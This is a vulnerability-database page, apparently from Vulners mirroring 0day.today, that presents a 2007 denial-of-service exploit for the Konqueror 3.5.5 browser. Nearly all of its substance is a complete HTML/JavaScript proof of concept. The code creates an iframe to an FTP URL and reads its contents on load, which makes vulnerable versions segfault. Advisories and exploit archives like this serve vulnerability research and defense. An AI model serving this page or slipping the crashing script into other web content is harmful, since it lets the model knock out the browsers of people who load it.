Lucene search
+L

Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit

🗓️ 05 Mar 2007 00:00:00Reported by markType 
zdt
 zdt
🔗 0day.today👁 12 Views

Konqueror 3.5.5 JavaScript FTP Iframe DoS Exploi

Code
===========================================================
Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit
===========================================================




<html>
<body>

Demo of how to make Konqueror 3.5.5 crash by [email protected]<p>
Simply load this file in Konqueror.  Vulnerable versions should segfault instantly with a null pointer exception.<p>
<p>

<script>
read_iframe = function(iframe_name) {
	var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;
	alert(banner);
}

var iframe = document.createElement("IFRAME");
iframe.setAttribute("src", 'ftp://localhost/anything');
iframe.setAttribute("name", 'myiframe');
iframe.setAttribute("id", 'myiframe');
iframe.setAttribute("onload", 'read_iframe("myiframe")');
iframe.style.width = "100px";
iframe.style.height = "100px";
	
document.body.appendChild(iframe);

</script>
</body>
</html>



#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Mar 2007 00:00Current
7High risk
Vulners AI Score7
12